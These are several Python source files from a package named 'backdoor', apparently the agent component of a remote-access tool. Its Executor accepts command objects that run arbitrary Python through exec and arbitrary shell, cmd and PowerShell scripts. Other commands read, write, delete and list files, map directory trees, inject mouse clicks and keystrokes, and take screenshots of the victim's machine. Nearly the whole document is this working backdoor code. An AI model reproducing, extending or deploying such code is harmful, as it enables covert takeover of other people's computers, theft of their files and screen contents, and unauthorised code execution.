# data.py

import json
import time
from typing import Literal, Self
from dataclasses import dataclass, field, asdict

from dacite import from_dict

from backdoor.labels import (
    DELETE, WRITE, SEARCH, READ, TEXT, JSON, BYTES
)

__all__ = [
    "Format",
    "Data",
    "File"
]

Formatter = Literal['text', 'json', 'bytes']
JsonValue = str | bytes | dict | list | int | float | bool | None

class Format:

    TEXT = TEXT
    BYTES = BYTES
    JSON = JSON

    FORMATS = {TEXT, BYTES, JSON}

    @staticmethod
    def encode(data: JsonValue) -> str:

        if not isinstance(data, (str, bytes)):
            data = json.dumps(data)

        if isinstance(data, str):
            return data

        if isinstance(data, bytes):
            return data.decode()

        raise TypeError(f"invalid data type: {type(data)}")

    @staticmethod
    def decode(data: str, f: str | Formatter) -> JsonValue:

        if f == Format.BYTES:
            return data.encode()

        if f == Format.TEXT:
            return data

        if f == Format.JSON:
            return json.loads(data)

        raise TypeError(f"invalid format: {f}")

    @staticmethod
    def format(data: JsonValue) -> str:

        if isinstance(data, bytes):
            return Format.BYTES

        elif isinstance(data, str):
            return Format.TEXT

        elif isinstance(data, (int, float, type(None), dict, list, tuple)):
            return Format.JSON

        raise TypeError(f"invalid data type: {type(data)}")

@dataclass(slots=True)
class Data:

    payload: JsonValue = None
    format: str | Formatter | None = None
    name: str | None = None
    action: Literal['read', 'write', 'delete', 'search'] | None = None
    timestamp: float = field(default_factory=time.time)

    def __post_init__(self) -> None:

        self.data()

    @property
    def file(self) -> bool:

        return isinstance(self, File)

    @property
    def io(self) -> bool:

        return self.action is not None

    @property
    def read(self) -> bool:

        return self.action == READ

    @property
    def write(self) -> bool:

        return self.action == WRITE

    @property
    def delete(self) -> bool:

        return self.action == DELETE

    @property
    def search(self) -> bool:

        return self.action == SEARCH

    @property
    def valid(self) -> bool:

        return not (self.io and (not self.name))

    def data(self) -> JsonValue:

        if (self.format is None) and (self.payload is not None):
            self.format = Format.format(self.payload)

        elif (self.format is not None) and (self.format != Format.format(self.payload)):
            # noinspection PyTypeChecker
            self.payload = Format.decode(self.payload, self.format)

        return self.payload

    def upload(self, memory: dict[str, ...]) -> bool:

        if self.name and self.read and not self.file:
            self.payload = memory[self.name]

            return True

        return False

    def update(self, memory: dict[str, ...], value: ... = Ellipsis) -> bool:

        if value == Ellipsis:
            value = self.data()

        if self.name and not self.file:
            if self.write:
                memory[self.name] = value

                return True

            if self.delete:
                memory.pop(self.name, None)

        return False

    @classmethod
    def load(cls, data: dict[str, JsonValue]) -> Self:

        data = data.copy()

        if None not in (data['payload'], data['format']):
            data['payload'] = Format.decode(data['payload'], data['format'])

        return from_dict(cls, data)

    def dump(self) -> dict[str, JsonValue]:

        data = asdict(self)
        data['payload'] = Format.encode(data['payload'])

        return data

    def copy(self) -> Self:

        data = self.dump()
        data.pop('timestamp')

        new = type(self).load(data)

        return new

@dataclass(slots=True)
class File(Data):

    position: int = 0
    size: int = None
    buffer: int = None



# action.py

import datetime as dt
from typing import Self
from dataclasses import dataclass, asdict

from dacite import from_dict

__all__ = [
    "Action"
]

@dataclass(slots=True, frozen=True)
class Action:

    type: str
    name: str
    repetitions: int = 1
    timeout: dt.timedelta | None = None
    thread: bool = False
    wait: bool = True

    @classmethod
    def load(cls, data: dict[str, ...]) -> Self:

        return from_dict(cls, data)

    def dump(self) -> dict[str, str | int]:

        return asdict(self)



# labels.py

__all__ = [
    "READ",
    "WRITE",
    "DELETE",
    "SEARCH",
    "TEXT",
    "BYTES",
    "JSON"
]

READ = 'read'
WRITE = 'write'
DELETE = 'delete'
SEARCH = 'search'

TEXT = 'text'
BYTES = 'bytes'
JSON = 'json'


# command.py

import json
import os
from uuid import uuid4
from typing import Self, Callable
from dataclasses import dataclass, field, asdict

from dacite import from_dict

from backdoor.action import Action
from backdoor.data import Data, Format, File
from backdoor.execution import SubProcess, SubThread

__all__ = [
    "Command",
    "CommandCapsule",
    "dump_command_json",
    "load_command_json",
    "delete_command_json"
]

JsonValue = str | bytes | dict | list | int | float | bool | None

@dataclass(slots=True)
class Command:

    id: str | None = field(default_factory=lambda: str(uuid4()))
    action: Action | None = None
    request: Data = field(default_factory=Data)
    response: Data = field(default_factory=Data)
    memory: dict[str, JsonValue] | None = None
    complete: bool = False
    running: bool = False
    forget: bool = False
    keep_request: bool = True
    error: str | None = None
    executions: list[SubProcess | SubThread] = field(
        init=False, default_factory=list, repr=False
    )

    def __post_init__(self) -> None:

        from backdoor.actions import Actions

        if (
            (self.action is not None) and
            (self.action.type in (Actions.DATA.TYPE, Actions.FILE.TYPE)) and
            (self.request.action is None)
        ):
            self.request.action = self.action.name

        elif (self.action is None) and (self.request.action is not None):
            self.action = Action(
                type=(
                    Actions.FILE.TYPE
                    if isinstance(self.request, File) else
                    Actions.DATA.TYPE
                ),
                name=self.request.action
            )

    @property
    def io(self) -> bool:

        return self.response.io or self.request.io

    @property
    def valid(self) -> bool:

        return self.request.valid and self.response.valid

    def stop(self) -> None:

        for execution in self.executions:
            execution.terminate()

        self.executions.clear()

        self.running = False

    def respond(self, value: JsonValue, name: str = None) -> Data:

        self.response = self.response.copy()

        self.response.payload = value
        self.response.name = name
        self.response.format = Format.format(value)

        return self.response

    @classmethod
    def load(cls, data: dict[str, JsonValue | dict[str, JsonValue]]) -> Self:

        return from_dict(cls, data)

    def dump(self) -> dict[str, JsonValue | dict[str, JsonValue]]:

        data = asdict(self.copy())
        data.pop('executions')

        return data

    def copy(self) -> Self:

        return Command(
            id=self.id,
            action=self.action,
            request=self.request,
            response=self.response,
            complete=self.complete,
            running=self.running,
            error=self.error
        )

@dataclass(slots=True, frozen=True)
class CommandCapsule:

    command: Command
    memory: dict[str, ...] = field(default_factory=dict)
    on_finish: Callable[["CommandCapsule"], ...] = None

def dump_command_json(command: Command, location: str = None) -> None:

    if (location is None) or location.endswith('/'):
        location = ""

    else:
        location += "/"

    os.makedirs(location, exist_ok=True)

    with open(f"{location}{command.id}.json", 'w') as file:
        json.dump(command.dump(), file, indent=4)

def load_command_json(command_id: str, location: str = None) -> Command:

    if (location is None) or location.endswith('/'):
        location = ""

    else:
        location += "/"

    with open(f"{location}{command_id}.json", 'r') as file:
        return Command.load(json.load(file))

def delete_command_json(command_id: str, location: str = None) -> None:

    if (location is None) or location.endswith('/'):
        location = ""

    else:
        location += "/"

    os.remove(f"{location}{command_id}.json")



# execution.py

import threading
import subprocess
import ctypes
import time
from abc import ABCMeta, abstractmethod
from dataclasses import dataclass, field

__all__ = [
    "SubProcess",
    "SubThread"
]

def terminate_thread(thread: threading.Thread) -> None:

    thread_id = thread.ident

    if ctypes.pythonapi.PyThreadState_SetAsyncExc(
            thread_id, ctypes.py_object(SystemExit)
    ) > 1:
        ctypes.pythonapi.PyThreadState_SetAsyncExc(thread_id, 0)

    thread.join()

class BaseSubExecution(metaclass=ABCMeta):

    def timeout(self, timeout: int = None) -> None:

        start = time.time()

        while (
            (
                timeout and
                (timeout > (time.time() - start))
            ) or
            (not timeout and self.is_alive())
        ):
            time.sleep(0.001)

        self.terminate()

    @abstractmethod
    def terminate(self) -> None:

        raise NotImplementedError

    @abstractmethod
    def is_alive(self) -> bool:

        raise NotImplementedError

@dataclass(slots=True)
class SubThread(BaseSubExecution):

    execution: threading.Thread | None = field(default=None, repr=False)

    def is_alive(self) -> bool:

        return self.execution.is_alive()

    def terminate(self) -> None:

        terminate_thread(self.execution)

    def run(self, *args, **kwargs) -> None:

        self.execution = self.execution or threading.Thread(*args, **kwargs)
        self.execution.start()

@dataclass(slots=True)
class SubProcess(BaseSubExecution):

    execution: subprocess.Popen | None = field(default=None, repr=False)
    result: subprocess.CompletedProcess | None = field(init=False, default=None, repr=False)

    _running: bool = field(init=False, default=False, repr=False)

    def is_alive(self) -> bool:

        return self._running

    def terminate(self) -> None:

        self.execution.kill()

        self._running = False

    def run(
            self,
            *args,
            data=None,
            capture_output=False,
            timeout=None,
            check=False,
            **kwargs
    ) -> subprocess.CompletedProcess:

        if data is not None:
            if kwargs.get('stdin') is not None:
                raise ValueError('stdin and input arguments may not both be used.')

            kwargs['stdin'] = subprocess.PIPE

        if capture_output:
            if kwargs.get('stdout') is not None or kwargs.get('stderr') is not None:
                raise ValueError(
                    'stdout and stderr arguments may not be used '
                    'with capture_output.'
                )

            kwargs['stdout'] = subprocess.PIPE
            kwargs['stderr'] = subprocess.PIPE

        with (self.execution or subprocess.Popen(*args, **kwargs)) as process:
            self._running = True

            self.execution = process

            try:
                stdout, stderr = process.communicate(data, timeout=timeout)

            except subprocess.TimeoutExpired as exc:
                self.terminate()

                # noinspection PyUnresolvedReferences,PyProtectedMember
                if subprocess._mswindows:
                    exc.stdout, exc.stderr = process.communicate()

                else:
                    process.wait()

                raise

            except (
                Exception, SystemExit, SystemError,
                InterruptedError, KeyboardInterrupt
            ) as e:
                self.terminate()

                raise e

            return_code = process.poll()

            if check and return_code:
                raise subprocess.CalledProcessError(
                    return_code, process.args,
                    output=stdout, stderr=stderr
                )

        self.execution = None
        self.result = subprocess.CompletedProcess(
            process.args, return_code, stdout, stderr
        )

        return self.result



# actions.py

import subprocess
import sys
import os
import threading
import time
from abc import ABCMeta
from io import StringIO
from dataclasses import dataclass, field, asdict
from typing import Callable, Literal, Self
import numpy as np

from dacite import from_dict

import pyautogui

from backdoor.command import CommandCapsule
from backdoor.execution import SubProcess, SubThread
from backdoor.data import File, Format
from backdoor.labels import READ, WRITE, SEARCH, DELETE

__all__ = [
    "ExecutionAction",
    "Actions",
    "DataAction",
    "ManagementAction",
    "SystemAction"
]

JsonValue = str | bytes | dict | list | int | float | bool | None
ActionsDict = dict[str, Callable[[CommandCapsule], JsonValue]]

class BaseActionGroup(metaclass=ABCMeta):

    ACTIONS: ActionsDict

    def __init__(self) -> None:

        self.actions = self.ACTIONS.copy()

class ExecutionAction(BaseActionGroup):

    PYTHON = 'python'
    POWERSHELL = 'powershell'
    CMD = 'cmd'
    SHELL = 'shell'
    SLEEP = 'sleep'
    CUSTOM = 'custom'

    TYPE = 'execution'

    @staticmethod
    def _execute(
            capsul: CommandCapsule, execution: Callable[[], ...]
    ) -> dict[str, str]:

        wait = capsul.command.action.wait

        timeout = None
        executor = None

        saved_stdout = sys.stdout
        saved_stderr = sys.stderr

        out = sys.stdout = StringIO()
        err = sys.stderr = StringIO()

        result = {}

        if capsul.command.action.timeout is not None:
            timeout = capsul.command.action.timeout.total_seconds()

        finish = lambda: (
            result.update(dict(stdout=out.getvalue(), stderr=err.getvalue())),
            capsul.on_finish(capsul)
        )

        if capsul.command.action.thread or timeout:
            executor = SubThread(threading.Thread(target=execution))

            capsul.command.executions.append(executor)
            capsul.command.running = True

            executor.run()

            if wait:
                executor.timeout(timeout=timeout)

            else:
                timer = SubThread(
                    threading.Thread(
                        target=lambda: (
                            executor.timeout(timeout=timeout),
                            finish()
                        )
                    )
                )

                capsul.command.executions.append(timer)

                timer.run()

        else:
            execution()

        sys.stdout = saved_stdout
        sys.stderr = saved_stderr

        if wait and not (executor and executor.is_alive()):
            finish()

        return result

    @staticmethod
    def python(capsul: CommandCapsule) -> dict[str, str]:

        return ExecutionAction._execute(
            capsul, lambda: exec(capsul.command.request.data(), capsul.memory)
        )

    @staticmethod
    def shell(
            capsul: CommandCapsule,
            executor: None | str | Literal['powershell', 'cmd'] = None
    ) -> dict[str, str]:

        timeout = None

        if capsul.command.action.timeout is not None:
            timeout = capsul.command.action.timeout.total_seconds()

        script = capsul.command.request.data()

        args = [*([executor] if executor else []), script]

        process = SubProcess()

        execution = lambda: process.run(
            args, shell=True, capture_output=True,
            text=True, timeout=timeout
        )

        value = ExecutionAction._execute(capsul, execution)

        if isinstance(process.result, subprocess.CompletedProcess):
            value['stdout'] = process.result.stdout
            value['stderr'] = process.result.stderr

        return value

    @staticmethod
    def powershell(capsul: CommandCapsule) -> dict[str, str]:

        return ExecutionAction.shell(
            capsul, executor=ExecutionAction.POWERSHELL
        )

    @staticmethod
    def cmd(capsul: CommandCapsule) -> dict[str, str]:

        return ExecutionAction.shell(capsul, executor=None)

    @staticmethod
    def sleep(capsul: CommandCapsule) -> str:

        seconds = capsul.command.request.data()

        time.sleep(seconds)

        return f"Slept for {seconds} seconds."

    ACTIONS: ActionsDict = {
        PYTHON: python,
        POWERSHELL: powershell,
        CMD: cmd,
        SHELL: shell,
        SLEEP: sleep,
        CUSTOM: None
    }

class DataAction(BaseActionGroup):

    WRITE = WRITE
    READ = READ
    DELETE = DELETE
    SEARCH = SEARCH

    TYPE = 'data'

    @staticmethod
    def write(capsul: CommandCapsule) -> str:

        name = capsul.command.request.name

        capsul.memory[name] = capsul.command.request.data()

        return f"'{name}' was written to memory in memory."

    @staticmethod
    def search(capsul: CommandCapsule) -> bool:

        return capsul.command.request.name in capsul.memory

    @staticmethod
    def read(capsul: CommandCapsule) -> JsonValue:

        name = capsul.command.request.name

        if name not in capsul.memory:
            raise ValueError(f"'{name}' is not saved in memory.")

        return capsul.memory[name]

    @staticmethod
    def delete(capsul: CommandCapsule) -> str:

        name = capsul.command.request.name

        if name not in capsul.memory:
            raise ValueError(f"'{name}' is not saved in memory.")

        capsul.memory.pop(name)

        return f"'{name}' was deleted from memory."

    ACTIONS: ActionsDict = {
        WRITE: write,
        READ: read,
        SEARCH: search,
        DELETE: delete
    }

class FileAction(BaseActionGroup):

    READ = READ
    WRITE = WRITE
    DELETE = DELETE
    SEARCH = SEARCH
    TREE = 'tree'
    LIST = 'list'

    TYPE = 'file'

    @staticmethod
    def read(capsul: CommandCapsule) -> str | bytes:

        if not isinstance(capsul.command.request, File):
            raise ValueError('request data must be of type File.')

        path = capsul.command.request.name

        if not path or not isinstance(path, str) or not os.path.exists(path):
            raise ValueError(
                'request data name must be a valid existing file name.'
            )

        f = capsul.command.request.format

        if not f:
            f = Format.BYTES

        elif f not in Format.FORMATS:
            raise ValueError(
                f"File format must be one of: "
                f"'{', '.join(Format.FORMATS)}', not: '{f}'."
            )

        if f == Format.TEXT:
            f = 'r'

        elif f == Format.BYTES:
            f = 'rb'

        with open(path, f) as file:
            file.seek(capsul.command.request.position, 0)
            payload = file.read(capsul.command.request.buffer or -1)

        capsul.command.request.position += len(payload)
        capsul.command.request.size = os.path.getsize(path)

        return payload

    @staticmethod
    def write(capsul: CommandCapsule) -> str:

        if not isinstance(capsul.command.request, File):
            raise ValueError('request data must be of type File.')

        path = capsul.command.request.name

        if not path or not isinstance(path, str):
            raise ValueError('request data name must be a valid file name.')

        f = capsul.command.request.format

        if not f:
            f = Format.BYTES

        elif f not in Format.FORMATS:
            raise ValueError(
                f"File format must be one of: "
                f"'{', '.join(Format.FORMATS)}', not: '{f}'."
            )

        if f == Format.TEXT:
            f = 'a+'

        elif f == Format.BYTES:
            f = 'a+b'

        payload = capsul.command.request.data()

        with open(path, f) as file:
            file.seek(capsul.command.request.position, 0)
            file.write(payload)

        capsul.command.request.position += len(payload)
        capsul.command.request.size = os.path.getsize(path)

        return f"Data was added to the end of file: '{path}'."

    @staticmethod
    def delete(capsul: CommandCapsule) -> str:

        if not isinstance(capsul.command.request, File):
            raise ValueError('request data must be of type File.')

        path = capsul.command.request.name

        if not path or not isinstance(path, str) or not os.path.exists(path):
            raise ValueError(
                'request data name must be a valid existing file name.'
            )

        os.remove(path)

        return f"file: '{path}' was deleted."

    @staticmethod
    def search(capsul: CommandCapsule) -> bool:

        path = capsul.command.request.name

        if not path or not isinstance(path, str):
            raise ValueError('request data name must be a valid file name.')

        return os.path.exists(path)

    @staticmethod
    def list(capsul: CommandCapsule) -> list[str]:

        path = capsul.command.request.name

        if not path or not isinstance(path, str) or not os.path.isdir(path):
            raise ValueError('request data name must be a valid directory name.')

        return os.listdir(path)

    ACTIONS: ActionsDict = {
        READ: read,
        WRITE: write,
        DELETE: delete,
        SEARCH: search,
        LIST: list,
        TREE: None
    }

class SystemAction(BaseActionGroup):

    CD = 'cd'
    ROOT = 'root'
    CWD = 'cwd'

    TYPE = 'system'

    ACTIONS: ActionsDict = {
        CD: None,
        ROOT: None,
        CWD: None
    }

@dataclass(slots=True, frozen=True)
class Click:

    position: tuple[int | None, int | None] = field(
        default_factory=lambda: (None, None)
    )
    key: Literal['left', 'right', 'middle'] = 'left'
    clicks: Literal['single', 'double', 'triple'] = 'single'
    direction: Literal['up', 'down'] | None = None
    repetitions: int = 1
    duration: float = 0.0
    interval: float = 0.0

    def action(self) -> None:

        command = None

        if self.direction is None:
            if self.clicks == 'single':
                command = pyautogui.click

            elif self.clicks == 'double':
                command = pyautogui.doubleClick

            elif self.clicks == 'triple':
                command = pyautogui.tripleClick

            if command is None:
                raise ValueError(
                    f"Invalid clicks data: '{self.clicks}'. "
                    f"must be one of: {', '.join(('single', 'double', 'triple'))}"
                )

            for _ in range(self.repetitions):
                command(
                    *self.position, button=self.key,
                    interval=self.interval, duration=self.duration
                )

        else:
            if self.direction == 'up':
                command = pyautogui.keyUp

            elif self.direction == 'down':
                command = pyautogui.keyDown

            if command is None:
                raise ValueError(
                    f"Invalid click direction: '{self.direction}'. "
                    f"must be one of: {', '.join(('up', 'down'))}"
                )

            command(self.key)

    @classmethod
    def load(cls, data: dict[str, JsonValue]) -> Self:

        return from_dict(cls, data)

    def dump(self) -> dict[str, JsonValue]:

        return asdict(self)

@dataclass(slots=True, frozen=True)
class Press:

    keys: list[str] = field(default_factory=list)
    repetitions: int = 1
    interval: float = 0.0

    def action(self) -> None:

        pyautogui.press(self.keys, self.repetitions, self.interval)

    @classmethod
    def load(cls, data: dict[str, JsonValue]) -> Self:

        return from_dict(cls, data)

    def dump(self) -> dict[str, JsonValue]:

        return asdict(self)

@dataclass(slots=True, frozen=True)
class Typing:

    text: str
    interval: float = 0.0

    def action(self) -> None:

        pyautogui.write(self.text, self.interval)

    @classmethod
    def load(cls, data: dict[str, JsonValue]) -> Self:

        return from_dict(cls, data)

    def dump(self) -> dict[str, JsonValue]:

        return asdict(self)

@dataclass(slots=True)
class Position:

    position: tuple[int | None, int | None] | None = field(
        default_factory=lambda: tuple(*pyautogui.position())[:2]
    )
    move: bool = False

    def action(self) -> None:

        if self.move:
            pyautogui.moveTo(*self.position)

    @classmethod
    def load(cls, data: dict[str, JsonValue]) -> Self:

        return from_dict(cls, data)

    def dump(self) -> dict[str, JsonValue]:

        return asdict(self)

@dataclass(slots=True)
class Screen:

    shot: bool | None | str | list[list[tuple[int] | list[int]]] = None
    size: tuple[int, int] = field(default_factory=lambda: pyautogui.size())

    def action(self) -> None:

        if self.shot is True:
            self.shot = np.asarray(pyautogui.screenshot()).tolist()

        elif isinstance(self.shot, str):
            pyautogui.screenshot(self.shot)

@dataclass(slots=True, frozen=True)
class Control:

    actions: list[Click | Press | Typing | Position | Screen] = field(
        default_factory=list
    )

    @classmethod
    def load(cls, data: dict[str, JsonValue]) -> Self:

        return from_dict(cls, data)

    def dump(self) -> dict[str, JsonValue]:

        return asdict(self)

class ControlAction(BaseActionGroup):

    ACTION = 'action'

    TYPE = 'control'

    @staticmethod
    def action(capsul: CommandCapsule) -> dict[str, JsonValue]:

        control_data = capsul.command.request.data()

        try:
            control = Control.load(control_data)

        except (TypeError, ValueError):
            raise ValueError(f"Invalid Control data: '{control_data}'.")

        if control.actions is not None:
            for action in control.actions:
                action.action()

        return control.dump()

    ACTIONS: ActionsDict = {
        ACTION: action
    }

class ManagementAction(BaseActionGroup):

    RERUN = 'rerun'
    CLEAN = 'clean'
    LAST = 'last'
    COMMAND = 'command'
    STOP = 'stop'
    FORGET = 'forget'
    ADD = 'add'
    DELETE = 'delete'
    RUNNING = 'running'

    TYPE = 'management'

    ACTIONS: ActionsDict = {
        RERUN: None,
        CLEAN: None,
        LAST: None,
        COMMAND: None,
        STOP: None,
        FORGET: None,
        ADD: None,
        RUNNING: None
    }

class Actions:

    EXECUTION = ExecutionAction
    MANAGEMENT = ManagementAction
    DATA = DataAction
    SYSTEM = SystemAction
    FILE = FileAction
    CONTROL = ControlAction

    ACTIONS: dict[str, ActionsDict] = {
        EXECUTION.TYPE: ExecutionAction.ACTIONS,
        MANAGEMENT.TYPE: ManagementAction.ACTIONS,
        DATA.TYPE: DataAction.ACTIONS,
        SYSTEM.TYPE: SYSTEM.ACTIONS,
        FILE.TYPE: FILE.ACTIONS,
        CONTROL.TYPE: CONTROL.ACTIONS
    }

    def __init__(self) -> None:

        self.execution = self.EXECUTION()
        self.management = self.MANAGEMENT()
        self.data = self.DATA()
        self.system = self.SYSTEM()
        self.file = self.FILE()
        self.control = self.CONTROL()

        self.actions: dict[str, ActionsDict] = {
            self.execution.TYPE: self.execution.actions,
            self.management.TYPE: self.management.actions,
            self.data.TYPE: self.data.actions,
            self.system.TYPE: self.system.actions,
            self.file.TYPE: self.file.actions,
            self.control.TYPE: self.control.actions
        }


# executor.py

import os
from uuid import uuid4
from dataclasses import dataclass, field, asdict
from typing import Callable, Self

from dacite import from_dict

from backdoor.command import Command, CommandCapsule
from backdoor.action import Action
from backdoor.actions import Actions

__all__ = [
    "Executor"
]

JsonValue = str | bytes | dict | list | int | float | bool | None
ActionsDict = dict[str, Callable[[CommandCapsule], JsonValue]]

class BaseError(Exception):

    pass

class ActionValidationError(BaseError):

    pass

class MemoryValidationError(BaseError):

    pass

class DataValidationError(BaseError):

    pass

def tree(path: str = '.') -> dict[str, ...]:

    data = {}

    for sub_path in os.listdir(path):
        p = os.path.join(path, sub_path)

        if os.path.isdir(p):
            data[sub_path] = tree(p)

        else:
            data[sub_path] = None

    return data

@dataclass(slots=True)
class Executor:

    id: str = field(default_factory=lambda: str(uuid4()))
    history: list[str] = field(default_factory=list)
    running: list[str] = field(default_factory=list)
    commands: dict[str, Command] = field(default_factory=dict)
    memory: dict[str, ...] = field(default_factory=dict)
    actions: dict[str, ActionsDict] = field(init=False, default_factory=dict)
    custom: dict[str, Command | None] = field(default_factory=dict)
    root_location: str = field(default_factory=os.getcwd)
    current_location: str = field(default_factory=os.getcwd)
    dump_command: Callable[[Command], ...] = None
    load_command: Callable[[str], Command] = None
    delete_command: Callable[[str], ...] = None

    def __post_init__(self) -> None:

        if self.id is None:
            self.id = str(uuid4())

        actions = Actions()

        management = actions.management
        system = actions.system
        execution = actions.execution
        file = actions.file

        file.actions[file.TREE] = self._tree

        execution.actions[execution.CUSTOM] = self._custom

        management.actions[management.RERUN] = lambda c: self._rerun()
        management.actions[management.CLEAN] = lambda c: self._clean()
        management.actions[management.LAST] = lambda c: self._last()
        management.actions[management.RUNNING] = lambda c: self._running()
        management.actions[management.COMMAND] = self._command
        management.actions[management.STOP] = self._stop
        management.actions[management.FORGET] = self._forget
        management.actions[management.DELETE] = self._delete
        management.actions[management.ADD] = self._add

        system.actions[system.ROOT] = lambda c: self._root()
        system.actions[system.CWD] = lambda c: self._cwd()
        system.actions[system.CD] = self._cd

        self.actions.update(actions.actions)

        for group in (management, system, execution, file):
            self.actions[group.TYPE] = group.actions

    def clean(self) -> None:

        self.history.clear()
        self.memory.clear()
        self.commands.clear()
        self.custom.clear()

    def _clean(self) -> None:

        self.clean()

    def _rerun(self) -> JsonValue:

        return self.execute(self._last_command()).response.data()

    def _cwd(self) -> JsonValue:

        return self.current_location

    def _cd(self, capsul: CommandCapsule) -> None:

        self.current_location = capsul.command.request.data()

        os.chdir(self.current_location)

    def _root(self) -> None:

        self.current_location = self.root_location

        os.chdir(self.current_location)

    def _last_command(self) -> Command:

        if not self.history:
            raise ValueError("Commands history is empty.")

        return self.commands[self.history[-1]]

    def _last(self) -> JsonValue:

        return self._last_command().dump()

    def _tree(self, capsul: CommandCapsule) -> dict[str, ...]:

        return tree(
            capsul.command.request.name or
            capsul.command.request.data() or
            self.current_location
        )

    def _command(self, capsul: CommandCapsule) -> JsonValue:

        command_id = capsul.command.request.data() or capsul.command.request.name

        if command_id not in self.commands:
            raise ValueError(f"No command found with id: '{command_id}'.")

        return self.commands[command_id].dump()

    def _add(self, capsul: CommandCapsule) -> str:

        try:
            command = Command.load(capsul.command.request.data())

        except (ValueError, TypeError):
            raise TypeError("Invalid custom command data.")

        self.add(command)

        return f"Custom command named '{command.id}' was added."

    def _custom(self, capsul: CommandCapsule) -> JsonValue:

        command_id = capsul.command.request.data() or capsul.command.request.name

        if command_id not in self.custom:
            raise ValueError(f"No custom command found with id: '{command_id}'.")

        if self.custom[command_id] is None:
            if self.load_command:
                try:
                    self.custom[command_id] = self.load_command(command_id)

                except Exception as e:
                    raise RuntimeError(
                        f"Failed to load custom command '{command_id}': {e}"
                    )

            else:
                raise ValueError(
                    "A loader must be defined to set and "
                    "run preexisting custom command."
                )

        return self.execute(self.custom[command_id]).dump()

    def remove(self, command: Command) -> None:

        command_id = command.id

        if command_id not in self.custom:
            raise ValueError(f"No custom command found with id: '{command_id}'.")

        self.custom.pop(command_id)

        if self.delete_command:
            self.delete_command(command_id)

    def _delete(self, capsul: CommandCapsule) -> str:

        command_id = capsul.command.request.data() or capsul.command.request.name

        if command_id not in self.custom:
            raise ValueError(f"No custom command found with id: '{command_id}'.")

        self.custom.pop(command_id)

        error = None

        if self.delete_command:
            try:
                self.delete_command(command_id)

            except Exception as e:
                error = str(e)

        message = f"Custom command named '{command_id}' was deleted."

        if error:
            message += f" Failed to run the custom delete operation: {error}"

        return message

    def _stop(self, capsul: CommandCapsule) -> str:

        command_id = capsul.command.request.data() or capsul.command.request.name

        if command_id is None:
            self.stop()

            return "All commands were stopped."

        if isinstance(command_id, str):
            ids = [command_id]

        else:
            ids = command_id

        for command_id in ids:
            if command_id not in self.commands:
                raise ValueError(f"No command found with id: '{command_id}'.")

            self.commands[command_id].stop()

        if len(ids) == 1:
            return "Command was stopped."

        elif len(ids) > 1:
            return "Commands were stopped."

        return "No command was stopped."

    def _forget(self, capsul: CommandCapsule) -> str:

        command_id = capsul.command.request.data() or capsul.command.request.name

        if command_id not in self.commands:
            raise ValueError(f"No command found with id: '{command_id}'.")

        self.commands.pop(command_id).stop()

        if command_id in self.history:
            self.history.remove(command_id)

        if command_id in self.running:
            self.running.remove(command_id)

        return "Command was stopped and deleted from history."

    def _running(self) -> list[Command]:

        return [self.commands[command_id] for command_id in self.running]

    def stop(self) -> None:

        for command_id in self.running:
            if command_id in self.commands:
                self.commands[command_id].stop()

    def add(self, command: Command) -> None:

        self.custom[command.id] = command

        if self.dump_command:
            try:
                self.dump_command(command)

            except Exception as e:
                raise RuntimeError(
                    f"Failed to save custom command '{command.id}': {e}"
                )

    def action(self, action: Action) -> Callable[[CommandCapsule], JsonValue]:

        if action.type not in self.actions:
            error = (
                f"Unrecognized action type: '{action.type}'. "
                f"Valid action types: "
                f"{', '.join(map(lambda s: f"'{s}'", self.actions))}"
            )

        else:
            if action.name not in self.actions[action.type]:
                error = (
                    f"Unrecognized action type: '{action.name}'. "
                    f"Valid action types: "
                    f"{', '.join(map(lambda s: f"'{s}'", self.actions[action.type]))}"
                )

            else:
                return self.actions[action.type][action.name]

        raise ActionValidationError(error)

    def append(self, command: Command) -> None:

        self.running.append(command.id)

        self.commands[command.id] = command

    def finish(self, command: Command) -> None:

        command.stop()

        self.register(command)

    def register(self, command: Command) -> None:

        if not (command.error or command.running):
            command.complete = True

        if command.complete:
            command.running = False

            command.response.update(self.memory)

            if command.id in self.running:
                self.running.remove(command.id)

            if not command.forget:
                self.history.append(command.id)

            if not command.keep_request:
                command.request = None

        if not command.forget:
            self.commands[command.id] = command

    def execute(self, command: Command) -> Command:

        value = None
        error = None

        self.append(command)

        try:
            if not command.valid:
                raise DataValidationError(
                    'A name must be given with data for read/write actions'
                )

            try:
                command.request.upload(self.memory)

            except KeyError:
                raise MemoryValidationError(
                    f"'{command.request.name}' could not be found in memory."
                )

            command.request.update(self.memory)

            action = self.action(command.action)

            repetitions = command.action.repetitions

            capsul = CommandCapsule(
                memory=command.memory or self.memory, command=command,
                on_finish=lambda c: self.finish(c.command)
            )

            value = [action(capsul) for _ in range(repetitions)]

            if repetitions == 1:
                value = value[0]

        except BaseError as e:
            error = f"An error raised before execution: {e}"

        except Exception as e:
            error = f"An error raised on execution: {e}"

        command.respond(value)
        command.error = error

        self.register(command)

        return command

    def dump(self, memory: bool = True) -> dict[str, ...]:

        data = asdict(self)

        data.pop('save')
        data.pop('load')
        data.pop('delete')

        if not memory:
            data.pop('memory')

        return data

    @classmethod
    def load(cls, data: dict[str, ...]) -> Self:

        return from_dict(cls, data)
